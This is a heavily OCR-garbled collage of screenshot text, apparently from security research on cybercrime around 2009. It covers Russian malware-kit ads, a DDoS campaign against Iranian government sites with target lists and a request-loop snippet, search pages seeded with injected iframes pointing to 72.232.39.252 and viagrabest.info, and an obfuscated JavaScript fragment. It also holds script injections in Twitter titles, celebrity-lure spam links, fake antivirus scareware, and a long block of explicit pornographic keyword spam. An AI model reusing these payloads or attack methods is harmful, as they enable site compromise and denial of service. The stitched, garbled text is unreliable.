District of Columbia Tax Forms Download free District of Columbia income tax forms and IRS 
tax forms. Also, learn how to reduce taxes, review tax software ... 
dc-form-state-tax. - Similar 


Minnesota Tax Form M1pr 

Form M1PR ebook Download If you need Form M1PR and instructions: www.taxes.state.mn-_us 
(651) 296-4444 Minnesota Tax Forms. Mail Station 1421. ... 

minnesota-tax-form-m pr. - Similar 
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WestHammer©: Christmas Edition 


ina Toro ¥ToG6bI AaTb NONb30BaTeNt NOYYCTBOBAaTb BCH MOLb NpopykTa 
WestHammer©: Christmas Edition cywecTByeT BO3MOKHOCTb OecnnarTHOro TecTa. 


3aABKH Ha TeECT NpMHuMatoTcs B ICQ: 511-609 


| P.S. 


Cpas3y xe o6paujatocb K TOBapMujaM KOTOpbie HENpeMeHHO SyAyT CTyYaTb 3a TECTOM He B eNAX 
npvo6petexna npovykta, a B UeNAX aHannv3a CNNONTOB B Hero BXOAAUIMX: 


He TpaTbTe Moe UM CBOe Bpema! 

Ecnu Bac mHTepecytoT CnnouTbI BXOAAUIMe B CBA3KY BbI MOKKETE CTYKHYTb B Ty Ke Camyto ICQ uu 
NONy4MTb BCe TO YTO Bbi Mornu 6bI CnanuTb Ha TecTe 6e3 NuWHe TpaTbI MOero mM Bawero 
BpemeHu! 


| Bcex c HacTynaroujMMn Npa3sgHMkamn HM NyCTb OHM NpompyT He3aG6biBaemo! 
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So far, their rather simplistic denial of service tools has managed to disrupt access to 


key government web sites, and the intensity of the attacks is prone to increase since the 
opposition appears to be in a "learning mode". 


What does "learning mode" stand for here? It’s their current stage of experimentation 
clearly indicating their inexperience with such campaigns and DDoS attacks in general. The 
opposition’s de-centralized chain of command isn’t even speculating on the use of botnets, 


since the primitive multi-threaded Iranian connections hitting Iranian sites seems to achieve 
their effect. 
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Msn Passwords 
HackedX24@hotmad tr 


@ 1: 192.168.1.20 


ommands Bit 
IP2P crackolficelS car _ ADD | 


|vinit ww. google fr 
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1, Nonywre Kapry Bcex Aopeses ¢ METHON: [Ep F] xenire na “acer, noxasare | 


Hanprestp, Mei XOTHM NOASMMTECCHUKH HS The 4ECTH, TOF AS YROSEIBDEM TO uacten 3. [py noowepeano 3mm 3 vactn, cnepes 6 None “wscTE” yresessen ia Tpysem My Nesyro “aCTE, NOTOH 
yRAsHeser | Mpydies MAPEY/TO “ACTH, NOTCH yKadewsen 2 1 Pyles MOCNAAHOHO MECTD KADTbI, 


2. Crenepypoesty mecary Ana NOCTYeT a chatesTor: 


hitp: Hvevwe Freehost | com/inks.html Best Links 

bktp: {few freehost 1 .com/dedinks.ttmi My Best Links 
bhtp: [few freehost2.com/dedinks. tami Links 

TORCTD CHOPOS CORUNA, NOTOM TEKCT ANA CDi, 


3. Mpomamceare stemaps Aopos c meTeoH | Exp | & Google, Ask, Yahooive 


4, Crerapypoeaty mecary Ana NocTHed'a CharerTom KapT AOpeces ¢ METHOH: | Exp 3] CG Na NOCTHHFa cne | 


5, Crerepepoest KapTe: Aopsees ¢ METKON: [ Exp | 
Tax wrote: 6 ogHori KapTe Beene of fi 00 ao e500 CChinOx nt Sante ax Ha FTP 
BaNBaTe Kap Ted Ha: | Bce noctynHme @puxocte 5] 
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Top 10 Spam-Sending Domains 


Data source: Commtouch Software Online Lab 
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mailer-daemon 
douglaspublications.com 
e.livingxl.com 
yahoo.com 

gmail.com 
icansucceed.org 
rmailmf.rakuten.co.jp 
keyence.co.jp 
hotmail.com 


_ tigeronline.com 
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Search results for YDP 113 PRICE<IFRAME src=if?2.232.39.252/a/> html 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

wew.torrentreactor.net/search. php?search=&words=¥ DP +1 13+PRICE%3CIFRAME% 
Wsre=//72.232.39.252/a/%3E. html - 54k - Cached - Similar pages 


Search results for SAFETY TRAINING<IFRAME src=//72.232.39.252/a/> html 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

weew torrentreactor.net/search. php?search=&words=SAFETY +TRAINING %3CIFRAME % 

QW sre=/72.232,39.252/a/%3E. html - 54k - Cached - Similar pages 


rch for | F LANGUAGE<IFRA =i 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 
wew.torrentreactor, net/,..//72,232.39.252/a/%3E. html - §4k - Cached - Similar pages 


rch for PORTA HARD DRIVES REV sIFRA 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 
wew.torrentreactor.net/...//72,232.39,252/a/%3E html - 4k - Cached - Similar pages 


Search results for RACHAEL RAYENGAGED<IFRAME src=//72.232.39.252/a ... 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

wew.torrentreactor. net/...//72.232.39.252/a/%3E. html - 2k - Cached - Similar pages 


Search results for READING PA MOVIES<IFRAME src=//72.232.39.252/a ... 
user. pass:. Login. Any category, Anime, a AEP. Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, S 

ww. torrentreactor.nat/.. M2232 39.2 aIE. html - 54k - Cached - Similar pages 


Search results for WORM OR VIRUS ALERT<IFRAME src=//72.232.39.252 ... 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

www. torrentreactor.net/...//72.232.39.252/a/%3E.himl - 54k - Cached - Similar pages 


Search results for FOTOS DE PUERTO RICO<IFRAME src=/72.232.39.262 ... 
user, pass:, Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 
wew.torrentreactor.net/...//72.232.39.252/a/%3E.himl - 54k - Cached - Similar pages 


Search results for RHAPSODY IN BLUE CLARINET SOLO<IFRAME src... 
user.. pass:. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV Shows, 
BushTorrent, CD Covers, S: 

wew.torrentreactor.nety.../72. 232 39.252/a/%3E. himl - 56k - Cached - Similar pages 


Search results for XYLENE<IFRAME src=//?2.232.39.252/a/> html 

user.. pass:. Login. Any category, Anime, rene Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Softwa 

werw. torrentreactor.net/search. hp? search=Swords=XYLENE%3CIFRAME% 
Qsre=/72.232,39,252/a/%3E. html - 51k - Cached - Similar pages 
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16.05.2008 - 31.05.2008 [+] { select} 


16 (w) 05 |] 2008 [~]- 02 [~) 06 |~) 2008 [»| | select] 


All ly ‘Subaccount stats All |»! 


16.05.2008 
17.05.2008 
18.05.2008 
19.05.2008 
20.05.2008 
21.05.2008 
22.05.2008 
it) 
24,05,2008 
25.05.2008 
26.05.2008 
27.05.2008 
28.05.2008 
29.05.2008 
30.05.2008 
31.05.2008 


ceeooooococooococooooooo 
oooooooocoocooocoe°e°c°ee 
SISISISSIZISISISIFISIS ISLS lvls 


Sales -S 
Installs -1 


SUPER PRIZE 
PROGRESS BAR 
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c:\sys\bin\Installer_Ox20026CA6.exe 
Operation: Run during installation Size: 10128/10272 


“s Capabilities; PowerMgmt, ReadDeviceData, WriteDeviceData, TrustedUI, ProtServ, SwEvent, NetworkServices, 
ReadUserData, WriteUserData, UserEnvironment 


c:\sys\bin\AcsServer.exe 
oe Operation: Run during installation Size: 42310/44774 
Capabilities; PowerMgmt, ReadDeviceData, WriteDeviceData, TrustedUI, NetworkServices, ReadUserData, WriteUserData 
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ALL PEOPLE AROUND THE WORLD: 
Please help us rm a full-scale cyberwar againts the dictatorial brutal goverrment of Ahmadinjead! Help Irarians to earn back their votes per instructions below 


Simply céck on few of the folowing imks (better too choose your selections from different categories); it opens the site in a new tab. [t wil not stop you from browsing but by sending a 
refresh signal to the target site wil saturate it. By doing so, we can block Abmadinjead’s governments flow of information in many of its key components as shown below 


Please help us and yourself from this lunatic who wil push the world to world war III. 


Governmental and HARDLINE NEWS: 


CENTRAL BANK, COMMERCE BANKS: 
http //nenn, pagereboot.com/ Purl =hity.// wr. chie/Srefresh=) 
hitto://newnn pagereboot.com/Purl=htty=//wrn, bem. wr/drefresh=} 


O1L,GAS, PETOCHEMICAL 


ECONOMY, TRADE, EXCHANGE; 


JUDICIARY; 


ite: (fue menaenhan? com/petohein- law maehee of Brefrech—1 


From a strategic perspective, this internal unrest resulting in the disruption of key government 
web sites, the de-facto propaganda vehicles of the current government, is directly denying 
their ability to influence the population and the media, which on its way to find information is 
inevitably going to visit the working opposition web sites. 


Moreover, the majority of people’s information warfare driven cyber attacks we’ve seen 
during the past two years, have all been orbiting around the scenario where a foreign adver- 
sary is attacking your infrastructure from all over the world. But in the current situation, it’s 
Iran’s internal network that’s self-eating itself, where the trade off for denying all the traffic 
would be the traffic which could be potentially influenced through PSYOPs (psychological 
operations). 
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/twi... 


about 3 hours ago from web 


Hi, ee a eee asta 
http://grabbingcash.convtwi... about 11 hours ago from u 


This screenshot shows one of 
my actual Twitter accounts 
that | used to generate the 
traffic shown in my other 
screen shots shown on this 
page. This was achieved 

by letting the software run for 
less than 2 hours total! 


©2009 Twitter AboutUs Contact Blog Status Apps API Search Help Jobs Terms Privacy 
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Twitter Online System Flow Chart 


Create More 


Followers 
Generate Massive Amount Of f= ifele Seren oe Tee 
Followers Through The Ce er On Autopilot & Build 


- li 
Twitter Online System Up Your Twitter 
Community 


Results To 


Promote Affiliate 
& | t | Products / Websites 
Generate Hundreds Of Sales & / Blogs 


Thousands Of Commissions All 
Through Twitter! 


[1231] 
Twitter Statistics for "email me at" 


“email me at" had total 280 tweets 
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PATTP/1. 8 303 Moved Permanensy 
Cate: 


on 
Server: Apache/2 
Location: http /O0heewebhost ova! 
\Content-dengit: 304 
Content-Type: texthrint; charsetemo-6899-1 
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Hey there! video_kelly_key is using | Join today! | 
‘ Join today! 
Twitter. 


Twitter is a free service that lets you keep in touch wath people using pena bean Nite 
the web, your phone, or IM. Join today to start recerving 
video_kelly_key’s updates 


video_kelly_key 


Video Pornografico da Cantora Kelly key.. 
http://player-videos-youtub... 


4 days ago from web 


video kelly key Video Pormogstico da Cantora Kelby key. hip //player-video- 
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Pagereboot.com 


Down Temporarily 


Update: 11:08 GMT ~ Ihe 


beck out Refresh Thing 


What has changed since [2]yesterday’s real-time OSINT analysis? The web based "Page 
Rebooter" tool heavily advertised by the opposition has decided to stop offering the service 
due to the massive abuse: 


"Unfortunately | have had to take the site down temporarily. The site was being used to 
attack other websites, until | can determine the source of these attacks, | have decided to 
keep it offline. My apologies to everyone who uses this site for it’s intended purpose, hopefully 
we'll be back soon. | have now received several emails regarding this. Unfortunately, last 
night’s spike in traffic cost me a lot of money in server costs, | therefore cannot afford to keep 
it online - even if the use is just. | have therefore decided to release the code for this site, so 
that you may create your own copies." 


Meanwhile, the opposition has come up with a segmented targets list including hardline 


news portals, official Anmadinejad sites, Iranian law enforcement sites, banks, judiciary and 
transportation sites, aiming to recruit international supporters: 
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var _Oxc26a = ["“Msxml2.XMLHTTP”. “Microsoft .XMLHTTP". “connect”. "“toUpperCase”. "GET". 


function XHConn(){ 
var _0x6687x2,_0x6687x3=false; 
try{ _0x6687x2= nev ActiveXObject(_Oxc26a[0x0)):; } 
catch(e) { try{ _0x6687x2= new ActiveXObject(_Oxc26a[O0xl}j): } 
catch(e) { try { _0x6687x2= new XMLHttpRequest(): } 
catch(e) { _0x6687x2=false: }: }: }: 


if (!_0x6687x2) { return null: } ; 


this{_Oxc26a[0x2))=function (_0x6687x4,_0x6687x5,._0x6687x6,_0x6687x7) { 
if (!_0x6687x2) { return false; }: 
_0x6687?x3=false: 
_0x6687xS=_0x6687x5[_Oxc26a[0x3))()-: 
try { 
if (_0x6687x5==_Oxc26a[O0x4)) { 
_0x6687x2([_Oxc26a[0x6))(_0x6687x5,_0x6687x44_Oxc26a[ 0x5 )+_0x6687x6. true): 
_0x6687x6=_Oxc26a[0x7): 
} else { 
_0x6687x2[_Oxc26a[0x6))(_0x6687xS._0x6687x4. true): 
_0x6687x2([_Oxc26al[Oxb))](_Oxc26a[0x8),_O0xc26a[0x9)+_0x6687x4+_O0xc26a[0xa)):; 
_0x6687x2[_Oxc26a[Oxb))(_Oxc26a[(Oxc)._Oxc26a[Oxd)): 


ba: 

_0x6687x2(_Oxc26a[Oxe)]=function () { 
if (_0x6687x2[_Oxc26a[Oxf])«"0x4&&!_0x6687x3) { 

_0x6687x3"true: 

_0x6687x7 (_0x6687x2) ; 

P33 
as 
_0x6687x2(_0xc26a[0x10))(_0x6687x6): 

} catch(z) { 
return false; 
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hange of quick, frequert answers t 


x e w ) 0 One Sample question VV 
Joong? Join today to start recerving ParisHiltonjpg1's 


Hey there! ParisHiltonjpg1 is using Twitter. 
witter is @ free service thet lets you keep in touch wath people througl 


i ia 
Name Paris Hilton jpg 
Location Holywood 
Web nitp Sshowmealt 
Bao Paris Hifton jpg 


Paris Hilton jpg HERE - CLICK ON 
THE WEBSITE LINK BELOW 
http://bit.ly/1aSZsY 
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1 i j wi 
Hey there! Britneywomani is using Twitter. Join today! 
Twitter is a free service that lets p in touch wath people through 


the exchange of quick, frequent 
1 doing? Join today to st 


eiving Britneywomani's 


Name Brtney Spears 
if . e Le<ation Hollywood 
F Britneywomani Web No fatewmenm 


mp3 


a 
Britney Spears womanizer mp3 
HERE - CLICK ON THE WEBSITE 
LINK BELOW http://bit.ly/1a5ZsY 
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arena 
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Jayz anna Lima 


O_O Poopying In Front oF 


shopping ~ — MipMinyuricomi6wbhac Shop Whata 


meal 


maine 
TODAY 
hipiAinyurice 
macuhnti 


i crash 


timmymarones Mon, 08 Jun 23:05 


poopying 
shopping 
mee e PREV NEXT & 


shame 
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Name Ruth Lapiz 
ome) ruthylapiz33 ae 


Updates i160 
Favorites 
Apple: Kylie Minogue Poopying In Following 
Front Of Shopping Mall, What a 
Shame, Shocking video TODAY : Ey BSS feed of rtnytapi 
http://tinyurl.com/mst7hr ee 


#Crapsuperpowers: Grad Pitt Poopyin 
What a Shame, Shocking video TODAY 


g In Front Of Shopping Mall, 
http: /Ainyurl.com/mst?hr 


BNP: Drunked Britney Poopying In Front Of Shopping Mall, What a 
Shame, Shocking video TODAY : hittp:/Ainyurl.cor/mst7hr 


“lie Minogue Poopying In Front Of Shopping Mall, What a 
hocking video TODAY : http:/Atinyurl.com/mst7hr 


#crapsuperpowers: Pedophile raped over 580 childrens, shocking 
news: http:/Ainyurl.com/mst7hr 
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Realtime results for "shocking video today” 0.22 » 


Show tweets written in 
ahellatemblak: iPhone: Adrianna Lima Poopying In Front Of w Shopping Mall, What a 
Shame, genie video TODAY © http /tinyur m 


Any Language ¥ 


Trending topics 


justinetimpol: MMS: Drunked Britney Poopying In Front Of Shopping Mall, What a 
Shame, Shocking video TODAY = http //tinyurl com/6wha 


saraadquiry: Apple: Drunked Britney ae In Front Of beast, Mall, What a 
Shame, Shocking video TODAY : http /Ainyurl com/i6wha 


jeremyva = Britney Spears Poopying In Front Of Shopping Mall, 
ila. Shame, Shocking video TODAY : http /Ainyurl coml6wha 


Nifty queries 
ruthiylapiz33: iPhone: Emma Watson Foopying | In Front of tales Mall, What a 
Shame, dcpienn video TODAY : http: //tinyurl com/6wha 


andreaimpresora: Jay-Z: Kytie Minogue —e In bila OF ‘Shopping Mall, What 
a Shame, Shocking video TODAY ; htto-/Ainyur mv/l6wbac 
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See All See Graph Tweet This Daily Tweets Rate Tweets 


chart by aenCharts com 


timemymartonest | Tue, 09 Jun 17:02 


adil Emma Watton 


timmymartones | Tue, 09 Jun 16:56 


Apple: Angelina Jolie 
*oopying In Front Of 
Aall, Whata 
ocking video 
May 10 May 13 May 16 May 19 


timmymarones | Tue, 09 Jun 16:55 


Selected Date: Messages have been Ried (count): 


Total Update Messages: Unique Users RTing: 4m) PREV NEXT 
Total Update Messages RT ed: Readers Reach: 


Percent Of Update Messages RT ed: Unique Readers Reach: 
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Home 


Bikeyy wors 
2009 masters payout 


any lepasd 


Porniulie 


Total infected files:[1] 


23320 


mikeyy worm 


Ber face was however and being She mikxeyy worm Peggotty was how to open the door before a dart at mikeyy worm 
score of mikeyy worm to see. Musdstones good intentions cows old plate syself in sassy ways at you really do is 
your heart no one can glad I was of it than the Dolphins bed mikeyy worm are and blankets round my mikeyy worn 


said for. mikeyy worm Tell him so with my candle. 


Sut I belseve mikeyy worm nane up @ amiable sikeyy worm 90 far with fasch and delicacy kisds of places her 
eyes from of my aunts face and his. She was one to mikeyy worm with the Doctor began mikeyy worm speak of 
pleasure and the string when The Dector I am mikeyy worn. 


° . ss 4 
© anh unmongkol thavong video 
° ite ver 


Masr Davy he said in a low tremulous he mikeyy worm well or he will thank my mikeyy worm comes to die dreans 
come true sikeyy worse thask His =ikeyy worm that he guided of se power to deceive ways to my I believed his 
trusted hin and he tcok her Rosa Dertle arms and with her seat recoiled iying mikeyy worm his struck at her 
with a face of such malignity so darkened and the stairs. She took her Emily mikxeyy worm shrunk. Peggotty 
shaking his wish me te so much left heavy mikeyy worm mikeyy worm womas better proclaimed os the.. 


tia and tamera mowry 


Copperfield sikeyy wors applying Sut chese writings chat stands sikeyy worms the Doctor clapping at che Dectors 
the subject Then his shoes and the top of. Moreover he ssid and came towards me he looked familiar Mighgate 
read singers songs to him and how island where the about mikeyy worm or she went mikeyy worm and mikeyy worm 
heads ss makicg che took se by often became involved. Such address and intelligence as I opposite sice of. You 
told me her. Eh Trotwood have mikeyy worm forgotten. 
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| Last adult URLs visited Type 


® http://porn-youtube- 


8.comvhardcore/1/1/1a4f28/0/0/ Teens 


Adult content traces found on your PC, your online activity is exposed to anyone 


Download scanner to wipe these traces and keep your PC clean 


Main progress:[37%) 


C:/Windows/system32/wbdbase.sve 


Infected level 


Criticalt 


Name 


Found Viruses 


Threath level 


Danger 
High 
Medium 


Low! 


@ SillyDI 


HIGH 


Recommended: Click the "Erase infected” button to erase all spyware and viruses from Windows 


| Erase infected 


J 
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Twitter /"><title><script>document.write(String fromCharC: 


Twitter is a free social messaging utility for staying connected in real-tim 
https://twitter. com/BobLally/status/1469409790 - 11 hours ago - Similar 


Twitter /"><title><script=document.write(String fromCharC: 
Twitter is a free social messaging utility for staying connected in real-tim 
https://twitter. com/dollars5/status/1 495764148 - 12 hours ago - Similar p 


Twitter /"><title><script=document.write(String fromCharC: 
Twitter is a free social messaging utility for staying connected in real-tim 
https://twitter. com/NanaMex/status/1475310043 - 12 hours ago - Similar 


Twitter /"><title><script=document.write(String fromCharC: 
Twitter is a free social messaging utility for staying connected in real-tirn 
twitter. com/Chaclay/status/1508060861 - 11 hours ago - Similar pages - 


Twitter /">stitle><script>document.write( String fromCharC: 


Twitter is a free social messaging utility for staying connected in real-tim 
twitter. com/Chaclay/status/1508068655 - 11 hours ago - Similar pages - 


Twitter /"><title><script=document. write( String fromCharC: 
Twitter is a free social messaging utility for staying connected in real-tim 
twitter.com/Chaclay/status/1508035830 - 11 hours ago - 


Similar pages - 


Twitter /"><title><script=document.write(String fromCharC 
Twitter is a free social messaging utility for staying connected in real-tim 
twitter. com/Chaclay/status/1503738916 - 11 hours ago - Similar pages - 


Twitter /"><title><script>document.write(String fromCharC: 
Twitter is a free social messaging utility for staying connected in real-tirn 
twitter. com/Chaclay/status/1508061297 - 11 hours ago - Similar pages - 
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TypeThat 


Parametis 
Task count 
Delay 
TimeOut 


Entered Good/Entered Bad 
Confined Good/Confimed Bad 
Unconfimmed/E xpired 

Earned $ 


Apakaet KNMKHHTe Ha CTpOKe Ana HaMeHeHHa NapameTpa 


(_] Strech images 
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while ( true ) { 


print '.'; 
flush( ); 


reqMultiCurls( ¢sites }; 


"ALL PEOPLE AROUND THE WORLD: 


Please help us in a full-scale cyberwar againts the dictatorial brutal government of Ah- 
madinjead! Help Iranians to earn back their votes per instructions below: 


Simply click on few of the following links (better too choose your selections from differ- 
ent categories); it opens the site in a new tab. It will not stop you from browsing but by 
sending a refresh signal to the target site will saturate it. By doing so, we can block Ahmada- 
injead’s governments flow of information in many of its key components as shown below. 
Please help us and yourself from this lunatic who will push the world to world war III." 


2335 
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Hey there! KateWinsletNude is 
using Twitter. 


Twitter is a free service that lets you keep in touch with people through 
the exchange of quick, frequent answers to one simple question: What 
are you doing? Join today to start receiving KateWinsiletNude's 


updates 


ie | KateWinsletNude 


Kate Winslet nude HERE - CLICK 
ON THE WEBSITE LIN 


http://oymomahon.com/fathul... 
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Hey there! KendraWilkinso1 is 
using Twitter. 


Twitter is a free service that lets you keep in touch with people through 
the exchange of quick, frequert answers to one simple question: What 
are you doing? Join today to start receiving KendraWilkinsot1's 


Kendra Wilkinson nude HERE - 
CLICK ON THE WEBSITE LINK 


http://bit.ly/Je2Sd 
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Login Join Twitter! 


=_ 
== > 


Join today! z. 


Already vere Terter “~s 
tom your shone? Ch here - 


a 
add 


Name Kate Winslet nude 
Locason Holywood 
Wed rap a unsate | 


207 «150 
folowing *olowers 


= Login Join Twitter! 


Join today! 


Alensy ueng Teeter 
from vou shone? Cho here 


Following 

a! Tod) 
AREA 
Le wr 
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SERRE 20 ioymomahon.comimirolimigeas3 html 
Conversations: Twitter 0; FriendFeed 0, Comments on Page 0 View All 
Locations. United States 1,204; Other 128, United Kingdom 96 View All 


Trattic 


Clicks Referrers Locations 


Now PastWeek PastMonth Total 


Click(s) 2,058 Since May 07, 2009 EST 


160 ~ 
1404 
1204 
100 4 
80 4 
60 
40 
20 


May 07, 2009 May 17, 2009 May 27, 2009 Jun 06, 2003 an 16, 2009 An 25, 2009 44 06, 2003 4416, 2009 
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Sure || Clicks 
639 This bitly link was added by therealtwitier 


639 Total Clicks 


All clicks on the aggregate bitly link biLIWigRFS 
Long Link hitpWshowmealitube.convpagivideo? nimi 


Conversatons. Twitter 0; FriendFeed 0; Comments on Page 0 View All 
Locatons: United States 457; United Kingdom 33; Other 32 View All 


Traffic 


Clicks Referrers Locations 
Now PastWeek PastMonth Total 


Click(s) 640 Since Jun 01, 2009 EST 


—+——— 
201, 2009 dun 08, 2009 dun 15, 2009 Jun 22, 2003 Jun 23, 2003 Jul 06, 2009 Jul 13, 2003 
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DAMN 
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DEBPAIIb 
se mp eo bo m rcp wm 
34 . 


AHBAPL 


17 18 


19 20 21 22 23 24 25 


26 27 28 29 30 31 


2 


5 67 8 91011 


i 
8 
E 


12 13 14 15 16 


ABryYCT 
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UNICEF - Voices of Youth: Search pages 

Your search - VAGRA AMEsrc=//viagrabest.info/V/> - did not match any documents, 
Suggestions:. Make sure all words are spelled correctly. ... 

weew. unicef org/.../%3E&spell=1 Bie=UTF-Sklr=Schent=voy&num=20esite=voy&oe=UTF-S - 7k 
- Cached - Similar pages 


UNICEF - Voices of Youth: Search pages 

Your search - VAGRA IFRAME src=//vlagrabest.info/V/ - did not match any documents. 
Suggestions:. Make sure all words are spelled correctly. ... 

weew.unicef orgoy/search/search. php?q=+VIAGRAHF RAME %20sre=/Magrabest. info/Vs - 7k 


- Cached - Similar pages 


UNICEF - Voices of Youth, Search pages 

Your search - VAGRA *yframe src=/Aviagrabest.info/V/* - did not match any documents. 
Suggestions:. Make sure all words are spelled correctly. ... 

weew.unicef org/voy/search/search. php?q=+VIAGRA+yframe%20src=/Magrabest info/V/* - 7k 


- Cached - Similar pages 


UNICEF - Voices of Youth: Search pages 

You searched unicef.org/voy (English) for VAGRA sre=/Aviagrabest.info/V/. Your search - 
VIAGRA src=//viagrabest.info/V/ - did not match any documents. ... 

wew.unicef org/voy/search/search. php?q=+VIAGRA%20sre=/Magrabest. info/V/ - 7k - 
Cached - Similar pages 


UNICEF - Voices of Youth: Search pages 

Your search - VAGRA IFRAMEsrc=//viagrabest.info/V/ - did not match any documents. 
Suggestions:. Make sure all words are spelled correctly. ... 

wew. unicef org/voy/search/search. php?q=+VIAGRAHFRAMEsrc=/Miagrabest. info/V/ - 7k - 
Cached - Similar pages 


UNICEF - Voices of Youth: Search pages 

Your search - VAGRA _IFRAME src=//viagrabest.info/V/_ - did not match any documents. 
Suggestions:. Make sure all words are spelled correctly. ... 

wew.unicef orgAvoy/search/search php?q=4+VIAGRA+_IFRAME%20src=/Miagrabest. info/V/_ - 
7k - Cached - Similar pages 


UNICEF - Voices of Youth: Search pages 

Your search - VAGRA ME src=/Mlagrabest.info/V/> - did not match any documents, 
Suggestions:. Make sure all words are spelled correctly. ... 

weew.unicef orgAvoy/search/search. php?q=4+VIAGRA+%20ME%20src=/Miagrabest. infosv/%3E 
- 7k - Cached - Similar pages 


UNICEF - Voices of Youth: Search pages 

Your search - VAGRA [no swearing please] src=/Aviagrabest.info/V/> - did not match any 
documents. Suggestions:. Make sure all words are spelled correctly. ... 

weew. unicef org/voy/search/search. php?q=+VIAGRA+%5Bno % 20 swearing %2Uplease%5D% 
Wsrc=/Magrabest. infoV/63E - 7k - Cached - Similar pages 


UNICEF - Voices of Youth: Search pages 

Your search - viagra iframesrc=/Mviagrabest.infoAy - did not match any documents. 
Suggestions:. Make sure all words are spelled correctly. ... 

wew. unicef org/voy/search/search. php?q=+wiagratiframesre=/Magrabest. infow - 7k - 
Cached - Similar pages 
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Hub Europe? Speculation about CIA prisoner transports Hata Fs na 2000 Wy Staz 4 
Icela and in Sept. 2005 in Malmo — possibly CIA prisoner B 
layovers ? transports to/from Guantanamo. 


According to government statements, US planes carrying suspected 
terrorists crossed Danish airspace about 20 times. 


UZBEKISTAN 


Germany Kosovo aa Kabul 
Frankfurt to Azerbaijan Guantaaina >. 
over Austrian airspace. US prisoners at IRAQ AFGHANISTAN 
nary Vase Ramotoin the US base 

were also believed Bondotest 
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"= Cow Orbit fon Cannon | When har poons, air strikes and nukes fail) v.7.0-0-0 


IMMA CHARGIN MAH LAZER 


Following the updated list of targets, a new [3]LOIC.exe DoS tool is being advertised. The 
tool is however, anything but sophisticated (it’s been around since 6 Jul 2008) compared 
to even the average Russian DDoS bot. Combined, the simplistic nature of the opposition’s 
attack tools indicates the lack of any in-depth understanding of information warfare principles, 
in times when other countries are already going beyond cyber warfare and aiming for the 
unrestricted warfare stage. 
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Threat % of % of 
Category | Threat Action Type Breaches Records 


Legend 
Malware Keyloggers and Spyware KeNOG 
Malware Backdoor or Command/Control BACKDR 1 


Hacking 


82% 


79% 


3 
3 


& 
# 


Misuse Abuse of system access/privileges 


Hacking Unauthorized access via default credentials’ DFCRED 
Misuse Violation of Acceptable Use and other policies’ 
Hacking Unauthorized access via weak or misconfigured ACLs 


Malware Packet sniffer’ SNIFFER | 89% 
Hacking Unauthorized access via stolen credentials smicreD | <1% 
Deceit Pretexting (Social Engineering) SOCIAL 2% 
Hacking Authentication bypass <1% 
Physical Physical theft of asset THEFT 2% 
Hacking Brute-force attack BRUTE 4% 7% 
sdaieate RAM scraper’ RAMSCR 4% <1% 
Deceit Phishing (and *ishing variations) PHISH 4% 4% 
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borgata gay atlantic city; borneo swingers, boring naked girls pics, 
borger girls high school basketball 


A boots soaked in cum: boots tea tree oi! facial cleanser. A boots teen! The boots teen nude! Of boots teens, boots tgp. Why 


booty gallery hard painful pleasure trailer; bootylicious black ass, 
booty fucked getting hoe phat, borate we have sexy time 


boots tgp heels else boots tgp picks from boots tgp pics else boots tzp sexy girls. [f boots the sanctuary facial oil. How boors tight high leather ferish 
from boots thong anal else boots webcams in boots with socks pom else boots x rated dvd rental or boots err on bootsektor sex online jetzt ohne kinder if 
bootsie goodhead nude. If bootsies rubber band on bootskins pom by bootskins xxx. A bootsmann pantyhose, bootsy 39 s mbber band. That bootsy collins 
get your freak on from bootsy collins his rubber band from bootsy mabber band. Why bootsy’s nubber band if bootsy’s nibber band live on dvd! The bootsy’s 
rubber band lyrics? The bootsys rubber band about bootsys rubber band cellularone ringtone clse bootsys rubber band lynics, bootsys rubber band nokia 
ringtone. A boot fetish! The boottachten joker boten yamaha buitenboordmotoren watersport” The bootty clap! Of booty girl rap or booty amateur! Of 
booty amateur video about booty anal. The booty and anal hole: booty and ass movies and trailers if booty aml ass rss channel! The booty and big tits, How 
booty and boob. The booty and boobs. A booty and breast or boory and clits, booty and pussy on booty and the beast cartoon porno by booty and throat 
fucked from booty and throat fucking’ The booty and tits if booty asian, booty asian girls: booty asian site? The booty asians to booty ass by booty ass 
black ebony on booty ass butt jiggle. Why booty ass butt juicy jiggle near booty ass butt rump behind. A booty ass butt shaking, booty ass butts about 
booty ass exposed. If booty ass fuck, booty ass naked. That booty ass pic if booty ass pics near booty ass shaking about booty ass site from booty ass tgp. 
Why booty ass titties. That booty asses. If booty babe on booty babe art near booty babe art by spencer davis. If booty babe art interviews clse booty 
babe dolls. In booty babe paradise! Of booty babe vids or booty babes near booty babes art, booty babes dolls if booty babes fucking clip free if booty 
babes mpg in booty babes tgp. That booty babes video. If booty babes with dicks about booty bang girls, The booty bank free pom. If booty bank pom 
near booty barbecue bitch vixen shut cunt about booty bass ass. If booty bass shake that ass. In booty bass shake that ass bitch if booty bay porn. How 
booty bbw ass else booty bbw pear shaped escort on booty bend over and ass fucked by booty bikini! Of booty bikinis by booty black ass by booty black 
ass bitches, booty black ass facial. If booty black babes or booty black chubby in booty black girl if booty black air oray. In booty black girls? The booty 
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Real Estate agency specializes in selling and renting 
properties at the higher end of the market in Italy, and 
other Countries of Europe 
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icaasecnaniilea Get Paid to Promote 


4 Mice «Motaxts 4 Payot Structure 4 Rewards og am @ Marketing Toots 4 Nerves ‘Sop 


’ * Welcome to Vomba Network 


eee GWAR nom 


* Get Paid tor Every Free install 
» Ear Reward Points 

« Make Moncey with referral 

» Access Real Time Reporting 
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hed 7 FREE Content & Software 
Lipa ctinata ones Od Experience High Conversion Rate! 


STGN UP Now! 


May 25, 2007 
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73 
DrHolakouee ptv_live 16x... Down With 
Shit 


